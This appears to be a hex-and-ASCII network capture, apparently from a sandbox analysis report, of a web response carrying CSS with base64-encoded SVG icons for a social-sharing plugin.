                                                                                              2021-12-13 23:57:32 UTC8478INData Raw: 34 77 4c 54 45 75 4e 7a 41 34 4c 6a 4d 33 4c 54 49 75 4d 44 4d 75 4f 54 49 74 4c 6a 55 75 4f 44 59 30 4c 53 34 79 4e 79 41 79 4c 6a 49 78 4e 69 34 77 49 44 4d 75 4d 7a 59 32 65 6d 30 74 4d 53 34 7a 4e 53 30 30 4c 6a 45 31 4d 32 4d 75 4d 53 34 77 4d 69 34 78 4f 54 59 75 4d 44 4d 31 4c 6a 4d 77 4f 43 34 77 4d 7a 55 75 4e 54 45 32 4c 6a 41 75 4f 44 55 33 4c 53 34 79 4f 43 41 78 4c 6a 41 30 4e 53 30 75 4e 7a 41 30 4c 6a 45 78 4f 43 30 75 4d 6a 6b 7a 4c 6a 45 33 4e 43 30 75 4e 6a 55 31 4c 6a 45 32 4e 79 30 78 4c 6a 41 7a 4f 47 45 79 4c 6a 6b 32 49 44 49 75 4f 54 59 75 4d 43 41 77 49 44 41 74 4c 6a 45 32 4e 79 30 75 4f 44 67 31 59 79 30 75 4d 6a 41 79 4c 53 34 31 4d 53 30 75 4e 54 67 31 4c 53 34 34 4e 54 63 74 4d 53 34 78 4e 54 63 74 4c 6a 67 31 4e 79 30 75 4d
                                                                                              Data Ascii: 4wLTEuNzA4LjM3LTIuMDMuOTItLjUuODY0LS4yNyAyLjIxNi4wIDMuMzY2em0tMS4zNS00LjE1M2MuMS4wMi4xOTYuMDM1LjMwOC4wMzUuNTE2LjAuODU3LS4yOCAxLjA0NS0uNzA0LjExOC0uMjkzLjE3NC0uNjU1LjE2Ny0xLjAzOGEyLjk2IDIuOTYuMCAwIDAtLjE2Ny0uODg1Yy0uMjAyLS41MS0uNTg1LS44NTctMS4xNTctLjg1Ny0uM
                                                                                              2021-12-13 23:57:32 UTC8480INData Raw: 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4e 53 34 33 4e 54 55 67 4e 53 34 31 4d 44 56 6f 4d 6a 41 75 4e 54 56 32 4d 69 34 31 4f 55 67 31 4c 6a 63 31 4e 58 59 74 4d 69 34 31 4f 58 70 74 4d 54 51 75 4f 54 6b 67 4d 54 67 75 4e 44 63 67 4d 53 34 35 4d 79 30 30 4c 6a 49 35 61 44 49 75 4d 6a 46 32 4c 54 6b 75 4f 54 64 6f 4c 54 45 34 64 6a 6b 75 4f 54 68 6f 4d 69 34 77 4e 47 77 78 4c 6a 6b 7a 49 44 51 75 4d 6a 6c 6f 4c 54 55 75 4e 7a 68 32 4d 69 34 31 4d 57 67 79 4d 53 34 34 4e 58 59 74 4d 69 34 31 4d 57 77 74 4e 69 34 78 4f 43 30 75 4d 44 46 36 62 53 30 78 4d 43 34 33 4e 43 30 32 4c 6a 6b 31 64 69 30 30 4c 6a 67 34 61 44 45 78 4c 6a 59 34 64 6a 51 75 4f 44 68 6f 4c 54 45 78 4c 6a 59 34 65 6d 30 33 4c 6a 6b 35 49 44 59 75 4f 54 56 6f 4c 54 51 75 4d 7a 64 73 4c
                                                                                              Data Ascii: IjZmZmIiBkPSJNNS43NTUgNS41MDVoMjAuNTV2Mi41OUg1Ljc1NXYtMi41OXptMTQuOTkgMTguNDcgMS45My00LjI5aDIuMjF2LTkuOTdoLTE4djkuOThoMi4wNGwxLjkzIDQuMjloLTUuNzh2Mi41MWgyMS44NXYtMi41MWwtNi4xOC0uMDF6bS0xMC43NC02Ljk1di00Ljg4aDExLjY4djQuODhoLTExLjY4em03Ljk5IDYuOTVoLTQuMzdsL
                                                                                              2021-12-13 23:57:32 UTC8481INData Raw: 4c 6a 49 31 4c 6a 55 79 4d 69 34 30 4d 69 34 33 4d 7a 59 75 4f 54 45 79 4c 6a 6b 32 4e 69 41 78 4c 6a 45 75 4e 44 63 67 4d 79 34 32 4d 53 34 35 4f 54 51 67 4e 43 34 33 4f 44 63 67 4d 53 34 78 4e 44 59 67 4d 53 34 78 4e 7a 51 75 4d 54 55 67 4d 53 34 35 4d 54 49 75 4e 44 59 32 49 44 49 75 4d 7a 55 74 4c 6a 51 31 4e 79 34 77 4d 44 49 75 4d 43 34 77 4f 44 67 74 4c 6a 49 79 4e 79 34 79 4d 44 67 74 4c 6a 55 32 4c 6a 4d 34 4d 69 30 78 4c 6a 45 31 4e 69 34 30 4d 7a 55 74 4d 69 34 78 4f 43 34 30 4d 7a 55 74 4d 69 34 35 4d 6a 51 75 4d 43 30 75 4d 44 63 32 4c 6a 45 78 4c 53 34 77 4e 7a 67 75 4d 54 45 75 4d 43 34 77 4c 6a 55 79 4e 43 30 75 4d 53 41 79 4c 6a 4d 34 49 44 45 75 4d 7a 41 7a 49 44 49 75 4f 44 63 31 4c 6a 55 31 4e 43 34 78 4f 54 63 67 4d 53 34 33 4c 6a 4d
                                                                                              Data Ascii: LjI1LjUyMi40Mi43MzYuOTEyLjk2NiAxLjEuNDcgMy42MS45OTQgNC43ODcgMS4xNDYgMS4xNzQuMTUgMS45MTIuNDY2IDIuMzUtLjQ1Ny4wMDIuMC4wODgtLjIyNy4yMDgtLjU2LjM4Mi0xLjE1Ni40MzUtMi4xOC40MzUtMi45MjQuMC0uMDc2LjExLS4wNzguMTEuMC4wLjUyNC0uMSAyLjM4IDEuMzAzIDIuODc1LjU1NC4xOTcgMS43LjM
                                                                                              2021-12-13 23:57:32 UTC8482INData Raw: 44 49 75 4f 54 49 31 49 44 55 75 4e 44 49 74 4d 79 30 31 4c 6a 6b 30 4e 69 41 32 4c 6a 4d 78 65 69 49 76 50 6a 77 76 63 33 5a 6e 50 67 3d 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 46 61 72 6b 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 5a 6d 5a 69 49 67 5a 44 30 69 54
                                                                                              Data Ascii: DIuOTI1IDUuNDItMy01Ljk0NiA2LjMxeiIvPjwvc3ZnPg==) no-repeat center center}.heateorSssFarkSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iI2ZmZiIgZD0iT
                                                                                              2021-12-13 23:57:32 UTC8484INData Raw: 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 5a 6d 5a 69 49 67 5a 44 30 69 54 54 45 35 4c 6a 6b 31 4e 69 41 78 4d 43 34 79 4d 57 4d 74 4c 6a 45 34 4d 79 34 78 4f 54 49 74 4c 6a 59 78 4d 79 34 78 4d 7a 67 74 4c 6a 6b 35 4c 6a 45 30 4c 53 34 78 4d 44 49 75 4d 7a 45 33 4c 53 34 78 4d 6a 59 75 4e 7a 45 74 4c 6a 49 34 4d 79 34 35 4e 7a 51 75 4e 6a 49 32 4c 6a 51 35 4e 69 41 78 4c 6a 67 31 4c 6a 51 77 4e 69 41 79 4c 6a 51 77 4e 53 34 35 4e 7a 49 67 4d 53 34 78 4f 54 63 74 4c 6a 51 30 4e 43 34 79 4e 44 55 74 4d
                                                                                              Data Ascii: 4,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iI2ZmZiIgZD0iTTE5Ljk1NiAxMC4yMWMtLjE4My4xOTItLjYxMy4xMzgtLjk5LjE0LS4xMDIuMzE3LS4xMjYuNzEtLjI4My45NzQuNjI2LjQ5NiAxLjg1LjQwNiAyLjQwNS45NzIgMS4xOTctLjQ0NC4yNDUtM
                                                                                              2021-12-13 23:57:32 UTC8485INData Raw: 30 4c 54 45 75 4f 54 45 33 4c 53 34 77 4e 6a 4d 74 4d 69 34 31 4e 53 30 75 4e 44 45 33 4c 53 34 7a 4e 7a 51 75 4d 54 51 74 4c 6a 4d 34 4d 69 34 32 4e 44 51 74 4c 6a 63 77 4e 69 34 34 4d 7a 55 75 4d 44 59 31 4c 6a 51 75 4e 53 34 30 4d 7a 59 75 4e 44 49 31 4c 6a 6b 33 4e 43 30 75 4f 54 49 31 4c 6a 4d 32 4c 54 49 75 4d 7a 45 7a 4c 6a 41 33 4c 54 49 75 4d 54 49 74 4d 53 34 78 4d 54 51 75 4e 54 4d 7a 4c 53 34 32 4d 54 55 67 4d 53 34 30 4f 53 30 75 4d 44 63 32 49 44 45 75 4f 44 4d 31 4c 53 34 35 4e 7a 4d 74 4c 6a 55 31 4e 79 30 75 4e 6a 55 32 4c 54 45 75 4d 54 59 32 4c 54 45 75 4d 6a 59 7a 4c 54 45 75 4e 44 45 7a 4c 54 49 75 4d 6a 49 7a 4c 54 49 75 4d 54 49 30 4c 6a 51 32 4e 43 30 7a 4c 6a 67 30 4d 79 41 78 4c 6a 4d 79 4d 79 30 31 4c 6a 67 67 4d 53 34 35 4e 44
                                                                                              Data Ascii: 0LTEuOTE3LS4wNjMtMi41NS0uNDE3LS4zNzQuMTQtLjM4Mi42NDQtLjcwNi44MzUuMDY1LjQuNS40MzYuNDI1Ljk3NC0uOTI1LjM2LTIuMzEzLjA3LTIuMTItMS4xMTQuNTMzLS42MTUgMS40OS0uMDc2IDEuODM1LS45NzMtLjU1Ny0uNjU2LTEuMTY2LTEuMjYzLTEuNDEzLTIuMjIzLTIuMTI0LjQ2NC0zLjg0MyAxLjMyMy01LjggMS45ND
                                                                                              2021-12-13 23:57:32 UTC8486INData Raw: 78 6e 49 47 5a 70 62 47 77 39 49 69 4e 6d 5a 6d 59 69 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 79 4d 69 34 32 4e 6a 63 67 4d 54 59 75 4e 6a 59 33 59 54 45 75 4e 6a 59 33 49 44 45 75 4e 6a 59 33 4c 6a 41 67 4d 53 41 77 49 44 41 74 4d 79 34 7a 4d 7a 51 67 4d 53 34 32 4e 6a 63 67 4d 53 34 32 4e 6a 63 75 4d 43 41 77 49 44 41 67 4d 43 41 7a 4c 6a 4d 7a 4e 48 70 4e 4d 6a 49 75 4d 7a 4d 7a 49 44 45 34 59 79 30 78 4c 6a 6b 79 4f 43 34 77 4c 54 51 67 4c 6a 6b 30 4e 69 30 30 49 44 49 75 4d 54 45 33 64 6a 45 75 4d 6a 45 33 61 44 68 32 4c 54 45 75 4d 6a 45 33 59 7a 41 74 4d 53 34 78 4e 79 30 79 4c 6a 41 33 4d 69 30 79 4c 6a 45 78 4e 79 30 30 4c 54 49 75 4d 54 45 33 65 6d 30 74 4d 54 4d 74 4d 53 34 7a 4d 7a 4e 68 4d 53 34 32 4e 6a 67 67 4d 53 34 32 4e 6a 67 75 4d
                                                                                              Data Ascii: xnIGZpbGw9IiNmZmYiPjxwYXRoIGQ9Ik0yMi42NjcgMTYuNjY3YTEuNjY3IDEuNjY3LjAgMSAwIDAtMy4zMzQgMS42NjcgMS42NjcuMCAwIDAgMCAzLjMzNHpNMjIuMzMzIDE4Yy0xLjkyOC4wLTQgLjk0Ni00IDIuMTE3djEuMjE3aDh2LTEuMjE3YzAtMS4xNy0yLjA3Mi0yLjExNy00LTIuMTE3em0tMTMtMS4zMzNhMS42NjggMS42NjguM
                                                                                              2021-12-13 23:57:32 UTC8488INData Raw: 31 4c 6a 63 33 4e 32 67 79 4e 69 34 78 4f 54 56 57 4e 69 34 79 4d 6a 4e 49 4d 69 34 35 4d 44 4a 32 4d 54 6b 75 4e 54 55 30 65 6d 30 79 4d 69 34 30 4e 43 30 30 4c 6a 41 77 4e 33 59 7a 4c 6a 67 77 4e 6b 67 32 4c 6a 6b 31 4e 58 59 74 4d 79 34 32 61 43 34 77 4d 7a 4a 73 4c 6a 41 35 4d 79 30 75 4d 44 4d 30 49 44 59 75 4f 53 30 31 4c 6a 55 31 4f 43 41 79 4c 6a 41 35 49 44 45 75 4e 7a 63 67 4d 53 34 34 4e 54 51 74 4d 53 34 32 4d 79 41 33 4c 6a 51 79 49 44 55 75 4d 6a 51 32 65 6d 30 77 4c 53 34 32 4e 7a 49 74 4e 79 34 77 4d 6a 63 74 4e 43 34 35 4d 54 63 67 4e 79 34 77 4d 6a 67 74 4e 69 34 77 4f 56 59 79 4d 53 34 78 65 6d 30 74 4d 53 34 78 4e 79 30 78 4e 43 34 32 4e 79 30 75 4f 54 51 33 4c 6a 6b 77 4e 57 4d 74 4d 69 34 7a 4e 54 59 67 4d 69 34 79 4f 44 51 74 4e 43
                                                                                              Data Ascii: 1Ljc3N2gyNi4xOTVWNi4yMjNIMi45MDJ2MTkuNTU0em0yMi40NC00LjAwN3YzLjgwNkg2Ljk1NXYtMy42aC4wMzJsLjA5My0uMDM0IDYuOS01LjU1OCAyLjA5IDEuNzcgMS44NTQtMS42MyA3LjQyIDUuMjQ2em0wLS42NzItNy4wMjctNC45MTcgNy4wMjgtNi4wOVYyMS4xem0tMS4xNy0xNC42Ny0uOTQ3LjkwNWMtMi4zNTYgMi4yODQtNC
                                                                                              2021-12-13 23:57:32 UTC8489INData Raw: 4d 35 4e 69 30 78 4c 6a 55 79 4c 6a 55 77 4d 69 30 75 4f 53 34 78 4e 43 30 78 4c 6a 51 35 4f 43 34 79 4d 53 30 78 4c 6a 63 35 4c 6a 49 78 53 44 59 75 4f 54 55 34 56 6a 67 75 4d 7a 49 34 65 6d 30 7a 4c 6a 67 33 4e 79 41 32 4c 6a 41 78 4e 32 67 78 4c 6a 63 30 59 79 34 32 4d 6a 4d 75 4d 43 41 78 4c 6a 41 31 4f 43 30 75 4d 54 4d 67 4d 53 34 7a 4d 44 49 74 4c 6a 4d 34 4d 69 34 79 4e 43 30 75 4d 6a 55 31 4c 6a 4d 32 4e 43 30 75 4e 6a 49 7a 4c 6a 4d 32 4e 43 30 78 4c 6a 45 77 4e 43 34 77 4c 53 34 30 4e 44 49 74 4c 6a 45 79 4d 79 30 75 4e 7a 6b 7a 4c 53 34 7a 4e 6a 59 74 4d 53 34 77 4e 44 55 74 4c 6a 49 30 4e 53 30 75 4d 6a 55 74 4c 6a 59 33 4c 53 34 7a 4e 7a 63 74 4d 53 34 79 4e 7a 59 74 4c 6a 4d 33 4e 32 67 74 4d 53 34 33 4e 6a 64 32 4d 69 34 35 4d 58 70 74 4d
                                                                                              Data Ascii: M5Ni0xLjUyLjUwMi0uOS4xNC0xLjQ5OC4yMS0xLjc5LjIxSDYuOTU4VjguMzI4em0zLjg3NyA2LjAxN2gxLjc0Yy42MjMuMCAxLjA1OC0uMTMgMS4zMDItLjM4Mi4yNC0uMjU1LjM2NC0uNjIzLjM2NC0xLjEwNC4wLS40NDItLjEyMy0uNzkzLS4zNjYtMS4wNDUtLjI0NS0uMjUtLjY3LS4zNzctMS4yNzYtLjM3N2gtMS43Njd2Mi45MXptM
                                                                                              2021-12-13 23:57:32 UTC8490INData Raw: 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 5a 6d 5a 69 49 67 5a 44 30 69 54 54 45 79 4c 6a 51 79 4e 79 41 79 4e 43 34 77 4e 7a 4e 6a 4c 6a 59 33 4e 79 34 30 49 44 45 75 4e 6a 4d 7a 4c 6a 63 77 4f 43 41 79 4c 6a 6b 79 4e 79 34 33 4d 44 67 67 4d 53 34 34 4e 44 67 75 4d 43 41 79 4c 6a 55 34 4e 79 30 75 4f 44 4d 67 4d 69 34 31 4f 44 63 74 4d 69 34 33 4d 56 59 31 61 44 49 75 4e 44 4d 32 64 6a 45 33 4c 6a 45 7a 59 7a
                                                                                              Data Ascii: mage/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iI2ZmZiIgZD0iTTEyLjQyNyAyNC4wNzNjLjY3Ny40IDEuNjMzLjcwOCAyLjkyNy43MDggMS44NDguMCAyLjU4Ny0uODMgMi41ODctMi43MVY1aDIuNDM2djE3LjEzYz
                                                                                              2021-12-13 23:57:32 UTC8492INData Raw: 4d 75 4d 44 6b 67 4d 69 34 34 4f 53 30 79 4c 6a 67 35 59 79 34 35 4d 79 30 75 4f 54 4d 75 4f 54 4d 74 4d 69 34 30 4d 7a 51 75 4d 43 30 7a 4c 6a 4d 32 4d 32 45 79 4c 6a 4d 33 4e 43 41 79 4c 6a 4d 33 4e 43 34 77 49 44 41 67 4d 43 30 7a 4c 6a 4d 32 4d 69 34 77 62 43 30 30 4c 6a 49 32 4d 69 41 30 4c 6a 49 32 4d 31 59 33 4c 6a 49 32 4e 30 45 79 4c 6a 4d 33 4f 43 41 79 4c 6a 4d 33 4f 43 34 77 49 44 41 67 4d 43 41 32 49 44 63 75 4d 6a 59 7a 56 6a 49 30 4c 6a 64 68 4d 69 34 7a 4e 7a 67 67 4d 69 34 7a 4e 7a 67 75 4d 43 41 77 49 44 41 67 4e 43 34 33 4e 54 59 75 4d 44 41 79 64 69 30 79 4c 6a 4d 78 4e 6d 77 78 4c 6a 4d 7a 4e 53 30 78 4c 6a 4d 7a 4e 53 41 7a 4c 6a 63 32 49 44 55 75 4d 44 64 68 4d 69 34 7a 4e 7a 67 67 4d 69 34 7a 4e 7a 67 75 4d 43 41 77 49 44 41 67 4d
                                                                                              Data Ascii: MuMDkgMi44OS0yLjg5Yy45My0uOTMuOTMtMi40MzQuMC0zLjM2M2EyLjM3NCAyLjM3NC4wIDAgMC0zLjM2Mi4wbC00LjI2MiA0LjI2M1Y3LjI2N0EyLjM3OCAyLjM3OC4wIDAgMCA2IDcuMjYzVjI0LjdhMi4zNzggMi4zNzguMCAwIDAgNC43NTYuMDAydi0yLjMxNmwxLjMzNS0xLjMzNSAzLjc2IDUuMDdhMi4zNzggMi4zNzguMCAwIDAgM
                                                                                              2021-12-13 23:57:32 UTC8493INData Raw: 4c 6a 63 30 4c 53 34 35 4d 57 77 74 4d 79 34 35 4d 7a 51 74 4e 53 34 35 4e 6a 51 67 4d 79 34 7a 4c 54 4d 75 4d 6d 4d 75 4d 6a 55 30 4c 53 34 79 4e 44 67 75 4e 44 59 7a 4c 53 34 30 4d 7a 4d 75 4e 6a 49 31 4c 53 34 31 4e 48 4d 75 4d 6a 6b 7a 4c 53 34 78 4e 7a 67 75 4e 44 45 74 4c 6a 49 78 4e 32 4d 75 4d 54 41 33 4c 53 34 77 4d 79 34 7a 4d 44 67 74 4c 6a 41 30 4e 69 34 31 4f 54 4d 74 4c 6a 41 30 4e 6d 67 75 4d 6a 41 33 64 69 30 75 4d 44 46 73 4c 6a 55 31 4e 53 30 75 4d 44 46 57 4f 43 34 31 4e 57 67 74 4c 6a 59 30 4f 48 59 75 4d 44 46 6f 4c 54 59 75 4d 44 67 33 64 6a 49 75 4d 54 4a 6f 4c 6a 55 30 4f 47 4d 75 4d 7a 45 75 4d 43 34 30 4f 54 51 75 4d 44 49 7a 4c 6a 55 33 4c 6a 41 33 4e 79 34 77 4e 7a 67 75 4d 44 55 30 4c 6a 45 78 4e 79 34 78 4d 79 34 78 4d 54 63
                                                                                              Data Ascii: Ljc0LS45MWwtMy45MzQtNS45NjQgMy4zLTMuMmMuMjU0LS4yNDguNDYzLS40MzMuNjI1LS41NHMuMjkzLS4xNzguNDEtLjIxN2MuMTA3LS4wMy4zMDgtLjA0Ni41OTMtLjA0NmguMjA3di0uMDFsLjU1NS0uMDFWOC41NWgtLjY0OHYuMDFoLTYuMDg3djIuMTJoLjU0OGMuMzEuMC40OTQuMDIzLjU3LjA3Ny4wNzguMDU0LjExNy4xMy4xMTc
                                                                                              2021-12-13 23:57:32 UTC8494INData Raw: 41 79 4f 47 4d 74 4c 6a 41 31 4c 6a 4d 77 4d 79 30 75 4d 6a 51 67 4d 53 34 78 4f 44 63 67 4d 53 34 77 4e 43 34 32 4e 44 64 7a 4e 69 34 35 4d 53 30 30 4c 6a 41 33 49 44 6b 75 4e 44 4d 74 4e 69 34 35 4e 6a 68 6a 4d 53 34 33 4d 7a 63 74 4d 53 34 35 4d 44 55 67 4d 69 34 31 4e 79 30 7a 4c 6a 67 30 4d 69 41 79 4c 6a 55 33 4c 54 55 75 4f 54 6c 36 54 54 45 78 4c 6a 4d 77 4d 69 41 78 4e 79 34 31 53 44 67 75 4f 54 45 34 59 79 30 75 4d 7a 51 33 4c 6a 41 74 4c 6a 59 7a 4c 53 34 79 4f 44 4d 74 4c 6a 59 7a 4c 53 34 32 4d 31 59 78 4d 69 34 78 59 7a 41 74 4c 6a 4d 30 4e 69 34 79 4f 44 4d 74 4c 6a 59 79 4f 43 34 32 4d 79 30 75 4e 6a 49 34 4c 6a 4d 30 4f 43 34 77 4c 6a 59 7a 4c 6a 49 34 4d 79 34 32 4d 79 34 32 4d 33 59 30 4c 6a 45 30 61 44 45 75 4e 7a 55 30 59 79 34 7a 4e
                                                                                              Data Ascii: AyOGMtLjA1LjMwMy0uMjQgMS4xODcgMS4wNC42NDdzNi45MS00LjA3IDkuNDMtNi45NjhjMS43MzctMS45MDUgMi41Ny0zLjg0MiAyLjU3LTUuOTl6TTExLjMwMiAxNy41SDguOTE4Yy0uMzQ3LjAtLjYzLS4yODMtLjYzLS42M1YxMi4xYzAtLjM0Ni4yODMtLjYyOC42My0uNjI4LjM0OC4wLjYzLjI4My42My42M3Y0LjE0aDEuNzU0Yy4zN
                                                                                              2021-12-13 23:57:32 UTC8496INData Raw: 44 30 69 49 7a 49 77 4d 7a 51 32 4f 43 49 67 5a 44 30 69 54 54 63 75 4d 44 67 67 4f 53 34 34 4f 44 4a 73 4c 6a 41 77 4e 43 30 75 4d 44 41 34 4c 6a 41 77 4e 43 30 75 4d 44 46 6a 4c 6a 45 35 4e 53 30 75 4e 44 41 34 4c 6a 51 79 4d 69 30 75 4f 44 45 75 4e 6a 63 30 4c 54 45 75 4d 54 6b 79 4c 6a 49 32 4e 43 30 75 4d 7a 6b 7a 4c 6a 55 7a 4c 53 34 33 4e 53 34 34 4d 53 30 78 4c 6a 41 32 49 44 45 75 4e 44 6b 7a 4c 54 45 75 4e 6a 67 7a 49 44 4d 75 4e 54 49 30 4c 54 49 75 4e 6a 6b 79 49 44 59 75 4d 44 67 74 4d 79 34 77 4d 54 56 73 4c 6a 63 7a 4d 79 30 75 4d 44 6b 33 4c 6a 51 79 4e 69 34 32 4d 53 41 34 4c 6a 51 79 4e 69 41 78 4d 69 34 78 4e 43 34 78 4f 44 67 75 4d 6a 63 75 4d 44 49 33 4c 6a 4d 79 4f 43 34 32 4d 44 67 67 4e 79 34 32 4e 53 34 78 4e 6a 51 67 4d 69 34 77
                                                                                              Data Ascii: D0iIzIwMzQ2OCIgZD0iTTcuMDggOS44ODJsLjAwNC0uMDA4LjAwNC0uMDFjLjE5NS0uNDA4LjQyMi0uODEuNjc0LTEuMTkyLjI2NC0uMzkzLjUzLS43NS44MS0xLjA2IDEuNDkzLTEuNjgzIDMuNTI0LTIuNjkyIDYuMDgtMy4wMTVsLjczMy0uMDk3LjQyNi42MSA4LjQyNiAxMi4xNC4xODguMjcuMDI3LjMyOC42MDggNy42NS4xNjQgMi4w
                                                                                              2021-12-13 23:57:32 UTC8497INData Raw: 34 79 4e 53 30 75 4e 44 55 7a 4c 6a 45 31 4c 53 34 31 65 69 49 76 50 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 39 49 69 4e 6d 4e 57 45 34 59 57 45 69 49 47 51 39 49 6b 30 34 4c 6a 4d 7a 49 44 45 77 4c 6a 55 35 4e 32 4d 75 4f 54 55 74 4d 69 34 33 4d 6a 55 67 4d 79 34 78 4c 54 51 75 4d 6a 45 30 49 44 59 75 4e 54 41 30 4c 54 51 75 4e 6a 45 31 62 43 34 7a 4d 54 51 75 4d 7a 49 79 59 79 30 79 4c 6a 4d 75 4d 7a 55 74 4e 53 34 33 4e 54 59 67 4d 69 34 33 4e 7a 63 74 4e 69 34 31 4f 54 67 67 4e 43 34 32 4d 6d 77 74 4c 6a 49 79 4c 53 34 7a 4d 6a 64 36 49 69 38 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 7a 51 34 4e 57 55 34 4e 53 49 67 5a 44 30 69 54 54 49 7a 4c 6a 59 35 49 44 49 79 4c 6a 63 79 4e 32 77 75 4d 6a 67 7a 49 44 4d 75 4d 44 67 30 4c 54 49 75 4f
                                                                                              Data Ascii: 4yNS0uNDUzLjE1LS41eiIvPjxwYXRoIGZpbGw9IiNmNWE4YWEiIGQ9Ik04LjMzIDEwLjU5N2MuOTUtMi43MjUgMy4xLTQuMjE0IDYuNTA0LTQuNjE1bC4zMTQuMzIyYy0yLjMuMzUtNS43NTYgMi43NzctNi41OTggNC42MmwtLjIyLS4zMjd6Ii8+PHBhdGggZmlsbD0iIzQ4NWU4NSIgZD0iTTIzLjY5IDIyLjcyN2wuMjgzIDMuMDg0LTIuO
                                                                                              2021-12-13 23:57:32 UTC8503INData Raw: 78 4f 54 59 67 4d 79 34 77 4f 53 41 78 4c 6a 63 79 49 44 4d 75 4e 44 4d 67 4d 53 34 7a 4d 7a 49 75 4d 6a 6b 31 49 44 49 75 4e 6a 49 30 4c 53 34 32 4d 44 63 67 4d 69 34 34 4f 53 30 79 4c 6a 41 79 4d 69 34 7a 4d 44 67 74 4d 53 34 32 4d 7a 4d 74 4c 6a 55 35 4d 79 30 79 4c 6a 67 34 4d 69 30 79 4c 6a 4d 30 4e 43 30 79 4c 6a 6b 34 4f 48 70 74 4c 54 45 77 4c 6a 63 78 4c 53 34 77 4f 44 56 6a 4c 54 45 75 4d 7a 63 30 4c 53 34 77 4e 69 30 79 4c 6a 51 31 4d 79 30 78 4c 6a 45 35 4e 43 30 79 4c 6a 51 30 4e 53 30 79 4c 6a 55 33 4c 6a 41 78 4c 54 45 75 4e 44 59 67 4d 53 34 78 4e 44 67 74 4d 69 34 31 4e 6a 63 67 4d 69 34 32 4d 53 30 79 4c 6a 55 30 49 44 45 75 4e 44 59 33 4c 6a 41 79 4e 69 41 79 4c 6a 55 33 49 44 45 75 4d 54 63 33 49 44 49 75 4e 54 49 7a 49 44 49 75 4e 6a
                                                                                              Data Ascii: xOTYgMy4wOSAxLjcyIDMuNDMgMS4zMzIuMjk1IDIuNjI0LS42MDcgMi44OS0yLjAyMi4zMDgtMS42MzMtLjU5My0yLjg4Mi0yLjM0NC0yLjk4OHptLTEwLjcxLS4wODVjLTEuMzc0LS4wNi0yLjQ1My0xLjE5NC0yLjQ0NS0yLjU3LjAxLTEuNDYgMS4xNDgtMi41NjcgMi42MS0yLjU0IDEuNDY3LjAyNiAyLjU3IDEuMTc3IDIuNTIzIDIuNj
                                                                                              2021-12-13 23:57:32 UTC8507INData Raw: 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 69 30 30 49 43 30 30 49 44 51 77 49 44 51 77 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 5a 6d 49 69 42 6b 50 53 4a 4e 4d 54 59 67 4d 54 59 75 4d 54 5a 6a 4c 54 4d 75 4e 6a 4d 31 4c 6a 41 74 4e 69 34 31 4f 43 30 79 4c 6a 6b 30 4e 53 30 32 4c 6a 55 34 4c 54 59 75 4e 54 68 44 4f 53 34 30 4d 69 41 31 4c 6a 6b 30 4e 53 41 78 4d 69 34 7a 4e 6a 51 67 4d 79 41 78 4e 69 41 7a 63 7a 59 75 4e 54 67 79 49 44 49 75 4f 54 51 31 49 44
